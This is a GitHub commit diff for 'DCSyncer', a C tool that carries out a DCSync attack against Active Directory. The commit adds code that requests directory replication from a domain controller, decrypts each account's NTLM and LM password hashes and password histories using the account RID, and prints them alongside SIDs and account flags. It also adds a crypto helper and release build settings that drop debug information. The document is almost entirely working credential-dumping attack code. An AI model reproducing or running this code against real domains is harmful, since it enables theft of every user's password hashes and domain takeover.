First version ready

notsoshant · Jun 7, 2020 · 9a229fe · 9a229fe
1 parent 6c9ab6f
commit 9a229fe
Show file tree

Hide file tree

Showing 10 changed files with 511 additions and 4 deletions.
diff --git a/DCSyncer.c b/DCSyncer.c
@@ -22,6 +22,13 @@ LPCSTR dcsync_oids_export[] = {
 	szOID_isDeleted,
 };
 
+const wchar_t* UF_FLAG[32] = {
+	L"SCRIPT", L"ACCOUNTDISABLE", L"0x4 ?", L"HOMEDIR_REQUIRED", L"LOCKOUT", L"PASSWD_NOTREQD", L"PASSWD_CANT_CHANGE", L"ENCRYPTED_TEXT_PASSWORD_ALLOWED",
+	L"TEMP_DUPLICATE_ACCOUNT", L"NORMAL_ACCOUNT", L"0x400 ?", L"INTERDOMAIN_TRUST_ACCOUNT", L"WORKSTATION_TRUST_ACCOUNT", L"SERVER_TRUST_ACCOUNT", L"0x4000 ?", L"0x8000 ?",
+	L"DONT_EXPIRE_PASSWD", L"MNS_LOGON_ACCOUNT", L"SMARTCARD_REQUIRED", L"TRUSTED_FOR_DELEGATION", L"NOT_DELEGATED", L"USE_DES_KEY_ONLY", L"DONT_REQUIRE_PREAUTH", L"PASSWORD_EXPIRED",
+	L"TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION", L"NO_AUTH_DATA_REQUIRED", L"PARTIAL_SECRETS_ACCOUNT", L"USE_AES_KEYS", L"0x10000000 ?", L"0x20000000 ?", L"0x40000000 ?", L"0x80000000 ?",
+};
+
 BOOL getDC(LPCWSTR fullDomainName, DWORD altFlags, LPWSTR* fullDCName)
 {
 	BOOL status = FALSE;
@@ -57,6 +64,112 @@ BOOL getCurrentDomainInfo(PPOLICY_DNS_DOMAIN_INFO* pDomainInfo)
 	return status;
 }
 
+BOOL decrypt(PBYTE encodedData, DWORD encodedDataSize, DWORD rid, LPCWSTR prefix, BOOL isHistory)
+{
+	DWORD i;
+	BOOL status = FALSE;
+	BYTE data[LM_NTLM_HASH_LENGTH];
+	for (i = 0; i < encodedDataSize; i += LM_NTLM_HASH_LENGTH)
+	{
+		status = NT_SUCCESS(RtlDecryptDES2blocks1DWORD(encodedData + i, &rid, data));
+		if (status)
+		{
+			if (isHistory)
+				PRINT_NORMAL(L"    %s-%2u: ", prefix, i / LM_NTLM_HASH_LENGTH);
+			else
+				PRINT_NORMAL(L"  Hash %s: ", prefix);
+			wprintf_hex(data, LM_NTLM_HASH_LENGTH, 0);
+			PRINT_NORMAL(L"\n");
+		}
+		else PRINT_ERROR(L"Error in RtlDecryptDES2blocks1DWORD");
+	}
+	return status;
+}
+
+void descrUser(SCHEMA_PREFIX_TABLE* prefixTable, ATTRBLOCK* attributes)
+{
+	DWORD rid = 0, i;
+	PBYTE encodedData;
+	DWORD encodedDataSize;
+	PVOID data;
+	ATTRVALBLOCK* sids;
+
+	findPrintMonoAttr(L"SAM Username         : ", prefixTable, attributes, szOID_ANSI_sAMAccountName, TRUE);
+	findPrintMonoAttr(L"User Principal Name  : ", prefixTable, attributes, szOID_ANSI_userPrincipalName, TRUE);
+
+	// TODO: Implement these functions
+	/*if (findMonoAttr(prefixTable, attributes, szOID_ANSI_sAMAccountType, &data, NULL))
+		PRINT_NORMAL(L"Account Type         : %08x ( %s )\n", *(PDWORD)data, kuhl_m_lsadump_samAccountType_toString(*(PDWORD)data));*/
+
+	if (findMonoAttr(prefixTable, attributes, szOID_ANSI_userAccountControl, &data, NULL))
+	{
+		PRINT_NORMAL(L"User Account Control : %08x ( ", *(PDWORD)data);
+		for (i = 0; i < min(ARRAYSIZE(UF_FLAG), sizeof(DWORD) * 8); i++)
+			if ((1 << i) & *(PDWORD)data)
+				PRINT_NORMAL(L"%s ", UF_FLAG[i]);
+		PRINT_NORMAL(L")\n");
+	}
+
+	/*if (findMonoAttr(prefixTable, attributes, szOID_ANSI_accountExpires, &data, NULL))
+	{
+		PRINT_NORMAL(L"Account expiration   : ");
+		displayLocalFileTime((LPFILETIME)data);
+		PRINT_NORMAL(L"\n");
+	}
+
+	if (findMonoAttr(prefixTable, attributes, szOID_ANSI_pwdLastSet, &data, NULL))
+	{
+		PRINT_NORMAL(L"Password last change : ");
+		displayLocalFileTime((LPFILETIME)data);
+		PRINT_NORMAL(L"\n");
+	}*/
+
+	if (sids = findAttr(prefixTable, attributes, szOID_ANSI_sIDHistory))
+	{
+		PRINT_NORMAL(L"SID history:\n");
+		for (i = 0; i < sids->valCount; i++)
+		{
+			PRINT_NORMAL(L"  ");
+			displaySID(sids->pAVal[i].pVal);
+			PRINT_NORMAL(L"\n");
+		}
+	}
+
+	if (findMonoAttr(prefixTable, attributes, szOID_ANSI_objectSid, &data, NULL))
+	{
+		PRINT_NORMAL(L"Object Security ID   : ");
+		displaySID(data);
+		PRINT_NORMAL(L"\n");
+		rid = *GetSidSubAuthority(data, *GetSidSubAuthorityCount(data) - 1);
+		PRINT_NORMAL(L"Object Relative ID   : %u\n", rid);
+
+		PRINT_NORMAL(L"\nCredentials:\n");
+		if (findMonoAttr(prefixTable, attributes, szOID_ANSI_unicodePwd, &encodedData, &encodedDataSize))
+			decrypt(encodedData, encodedDataSize, rid, L"NTLM", FALSE);
+		if (findMonoAttr(prefixTable, attributes, szOID_ANSI_ntPwdHistory, &encodedData, &encodedDataSize))
+			decrypt(encodedData, encodedDataSize, rid, L"ntlm", TRUE);
+		if (findMonoAttr(prefixTable, attributes, szOID_ANSI_dBCSPwd, &encodedData, &encodedDataSize))
+			decrypt(encodedData, encodedDataSize, rid, L"LM  ", FALSE);
+		if (findMonoAttr(prefixTable, attributes, szOID_ANSI_lmPwdHistory, &encodedData, &encodedDataSize))
+			decrypt(encodedData, encodedDataSize, rid, L"lm  ", TRUE);
+	}
+
+	/*if (findMonoAttr(prefixTable, attributes, szOID_ANSI_supplementalCredentials, &encodedData, &encodedDataSize))
+	{
+		PRINT_NORMAL(L"\nSupplemental Credentials:\n");
+		descrUserProperties((PUSER_PROPERTIES)encodedData);
+	}*/
+}
+
+void descrObject(SCHEMA_PREFIX_TABLE* prefixTable, ATTRBLOCK* attributes, LPCWSTR szSrcDomain, BOOL someExport)
+{
+	if (findMonoAttr(prefixTable, attributes, szOID_ANSI_sAMAccountName, NULL, NULL))
+	{
+		findPrintMonoAttr(L"\n\nObject RDN           : ", prefixTable, attributes, szOID_ANSI_name, TRUE);
+		descrUser(prefixTable, attributes);
+	}
+}
+
 int dcsync(BOOL allData, LPCWSTR szUser, LPCWSTR szGuid)
 {
 	LPCWSTR szDomain = NULL, szDc = NULL, szService = NULL;
@@ -118,7 +231,25 @@ int dcsync(BOOL allData, LPCWSTR szUser, LPCWSTR szGuid)
 			{
 				if (dwOutVersion == 6 && (allData || getChRep.V6.cNumObjects == 1))
 				{
-					PRINT_SUCCESS(L"Success in replication!");
+					if (ProcessGetNCChangesReply(&getChRep.V6.PrefixTableSrc, getChRep.V6.pObjects))
+					{
+						REPLENTINFLIST* pObject = getChRep.V6.pObjects;
+						for (i = 0; i < getChRep.V6.cNumObjects; i++)
+						{
+							descrObject(&getChRep.V6.PrefixTableSrc, &pObject[0].Entinf.AttrBlock, szDomain, NULL);
+							pObject = pObject->pNextEntInf;
+						}
+					}
+					else
+					{
+						PRINT_ERROR(L"Error in ProcessGetNCChangesReply\n");
+						break;
+					}
+					if (allData)
+					{
+						RtlCopyMemory(&getChReq.V8.uuidInvocIdSrc, &getChRep.V6.uuidInvocIdSrc, sizeof(UUID));
+						RtlCopyMemory(&getChReq.V8.usnvecFrom, &getChRep.V6.usnvecTo, sizeof(USN_VECTOR));
+					}
 				}
 				else
 					PRINT_ERROR(L"DRSGetNCChanges, invalid dwOutVersion (%u) and/or cNumObjects (%u)\n", dwOutVersion, getChRep.V6.cNumObjects);
@@ -144,7 +275,7 @@ int dcsync(BOOL allData, LPCWSTR szUser, LPCWSTR szGuid)
 
 int main(int argc, wchar_t* argv[])
 {
-    
+	asn1_init();
 	dcsync(TRUE, NULL, NULL);
 
 }

diff --git a/DCSyncer.vcxproj b/DCSyncer.vcxproj
@@ -51,6 +51,7 @@
     <PlatformToolset>v142</PlatformToolset>
     <WholeProgramOptimization>true</WholeProgramOptimization>
     <CharacterSet>Unicode</CharacterSet>
+    <UseOfMfc>Static</UseOfMfc>
   </PropertyGroup>
   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
   <ImportGroup Label="ExtensionSettings">
@@ -85,6 +86,8 @@
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
     <LinkIncremental>false</LinkIncremental>
+    <IncludePath>$(SolutionDir)inc;$(VC_IncludePath);$(WindowsSDK_IncludePath);</IncludePath>
+    <LibraryPath>$(SolutionDir)lib;$(VC_LibraryPath_x64);$(WindowsSDK_LibraryPath_x64)</LibraryPath>
   </PropertyGroup>
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
     <ClCompile>
@@ -130,7 +133,7 @@
     <Link>
       <SubSystem>Console</SubSystem>
       <GenerateDebugInformation>true</GenerateDebugInformation>
-      <AdditionalDependencies>kernel32.lib;user32.lib;secur32.lib;rpcrt4.lib;ntdll.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;netapi32.lib;msasn1.min.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <AdditionalDependencies>kernel32.lib;user32.lib;secur32.lib;bcrypt.lib;ncrypt.lib;cryptdll.lib;rpcrt4.lib;ntdll.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;netapi32.lib;msasn1.min.lib;%(AdditionalDependencies)</AdditionalDependencies>
     </Link>
   </ItemDefinitionGroup>
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
@@ -141,21 +144,32 @@
       <SDLCheck>true</SDLCheck>
       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
       <ConformanceMode>true</ConformanceMode>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <StringPooling>true</StringPooling>
+      <ExceptionHandling>false</ExceptionHandling>
     </ClCompile>
     <Link>
       <SubSystem>Console</SubSystem>
       <EnableCOMDATFolding>true</EnableCOMDATFolding>
       <OptimizeReferences>true</OptimizeReferences>
-      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <AdditionalDependencies>kernel32.lib;user32.lib;secur32.lib;cryptdll.lib;rpcrt4.lib;ntdll.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;netapi32.lib;msasn1.min.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <DelayLoadDLLs>
+      </DelayLoadDLLs>
+      <AssemblyDebug>false</AssemblyDebug>
+      <LinkTimeCodeGeneration>UseLinkTimeCodeGeneration</LinkTimeCodeGeneration>
+      <ImageHasSafeExceptionHandlers>false</ImageHasSafeExceptionHandlers>
     </Link>
   </ItemDefinitionGroup>
   <ItemGroup>
+    <ClCompile Include="crypto.c" />
     <ClCompile Include="DCSyncer.c" />
     <ClCompile Include="drsr.c" />
     <ClCompile Include="helper.c" />
     <ClCompile Include="rpc.c" />
   </ItemGroup>
   <ItemGroup>
+    <ClInclude Include="crypto.h" />
     <ClInclude Include="drsr.h" />
     <ClInclude Include="globals.h" />
     <ClInclude Include="helper.h" />

diff --git a/DCSyncer.vcxproj.filters b/DCSyncer.vcxproj.filters
@@ -36,6 +36,9 @@
     <ClCompile Include="helper.c">
       <Filter>Source Files</Filter>
     </ClCompile>
+    <ClCompile Include="crypto.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
   </ItemGroup>
   <ItemGroup>
     <ClInclude Include="globals.h">
@@ -53,6 +56,9 @@
     <ClInclude Include="inc\msasn1.h">
       <Filter>globals\inc</Filter>
     </ClInclude>
+    <ClInclude Include="crypto.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
   </ItemGroup>
   <ItemGroup>
     <Library Include="lib\msasn1.min.lib">

diff --git a/crypto.c b/crypto.c
@@ -0,0 +1,48 @@
+#pragma once
+
+#include "crypto.h"
+
+BOOL crypto_hash(ALG_ID algid, LPCVOID data, DWORD dataLen, LPVOID hash, DWORD hashWanted)
+{
+	BOOL status = FALSE;
+	HCRYPTPROV hProv;
+	HCRYPTHASH hHash;
+	DWORD hashLen;
+	PBYTE buffer;
+	PKERB_CHECKSUM pCheckSum;
+	PVOID Context;
+
+	if (algid == CALG_CRC32)
+	{
+		if ((hashWanted == sizeof(DWORD)) && NT_SUCCESS(CDLocateCheckSum(KERB_CHECKSUM_REAL_CRC32, &pCheckSum)))
+		{
+			if (NT_SUCCESS(pCheckSum->Initialize(0, &Context)))
+			{
+				pCheckSum->Sum(Context, dataLen, data);
+				status = NT_SUCCESS(pCheckSum->Finalize(Context, hash));
+				pCheckSum->Finish(&Context);
+			}
+		}
+	}
+	else if (CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT))
+	{
+		if (CryptCreateHash(hProv, algid, 0, 0, &hHash))
+		{
+			if (CryptHashData(hHash, (LPCBYTE)data, dataLen, 0))
+			{
+				if (CryptGetHashParam(hHash, HP_HASHVAL, NULL, &hashLen, 0))
+				{
+					if (buffer = (PBYTE)LocalAlloc(LPTR, hashLen))
+					{
+						status = CryptGetHashParam(hHash, HP_HASHVAL, buffer, &hashLen, 0);
+						RtlCopyMemory(hash, buffer, min(hashLen, hashWanted));
+						LocalFree(buffer);
+					}
+				}
+			}
+			CryptDestroyHash(hHash);
+		}
+		CryptReleaseContext(hProv, 0);
+	}
+	return status;
+}
diff --git a/crypto.h b/crypto.h
@@ -0,0 +1,48 @@
+#pragma once
+
+#include "globals.h"
+
+#define CALG_CRC32	(ALG_CLASS_HASH | ALG_TYPE_ANY | 0)
+
+#define	MD5_DIGEST_LENGTH	16
+#define LM_NTLM_HASH_LENGTH	16
+
+#define RtlDecryptDES2blocks1DWORD	SystemFunction025
+#define RtlEncryptDecryptRC4		SystemFunction032
+
+typedef NTSTATUS(WINAPI* PKERB_CHECKSUM_INITIALIZE) (DWORD unk0, PVOID* pContext);
+typedef NTSTATUS(WINAPI* PKERB_CHECKSUM_SUM) (PVOID pContext, DWORD Size, LPCVOID Buffer);
+typedef NTSTATUS(WINAPI* PKERB_CHECKSUM_FINALIZE) (PVOID pContext, PVOID Buffer);
+typedef NTSTATUS(WINAPI* PKERB_CHECKSUM_FINISH) (PVOID* pContext);
+typedef NTSTATUS(WINAPI* PKERB_CHECKSUM_INITIALIZEEX) (LPCVOID Key, DWORD KeySize, DWORD KeyUsage, PVOID* pContext);
+
+typedef struct _MD5_CTX {
+	DWORD count[2];
+	DWORD state[4];
+	BYTE buffer[64];
+	BYTE digest[MD5_DIGEST_LENGTH];
+} MD5_CTX, * PMD5_CTX;
+
+typedef struct _CRYPTO_BUFFER {
+	DWORD Length;
+	DWORD MaximumLength;
+	PBYTE Buffer;
+} CRYPTO_BUFFER, * PCRYPTO_BUFFER;
+
+typedef struct _KERB_CHECKSUM {
+	LONG Type;
+	DWORD Size;
+	DWORD Flag;
+	PKERB_CHECKSUM_INITIALIZE Initialize;
+	PKERB_CHECKSUM_SUM Sum;
+	PKERB_CHECKSUM_FINALIZE Finalize;
+	PKERB_CHECKSUM_FINISH Finish;
+	PKERB_CHECKSUM_INITIALIZEEX InitializeEx;
+	PVOID unk0_null;
+} KERB_CHECKSUM, * PKERB_CHECKSUM;
+
+extern VOID WINAPI MD5Init(PMD5_CTX pCtx);
+extern VOID WINAPI MD5Update(PMD5_CTX pCtx, LPCVOID data, DWORD cbData);
+extern VOID WINAPI MD5Final(PMD5_CTX pCtx);
+
+BOOL crypto_hash(ALG_ID algid, LPCVOID data, DWORD dataLen, LPVOID hash, DWORD hashWanted);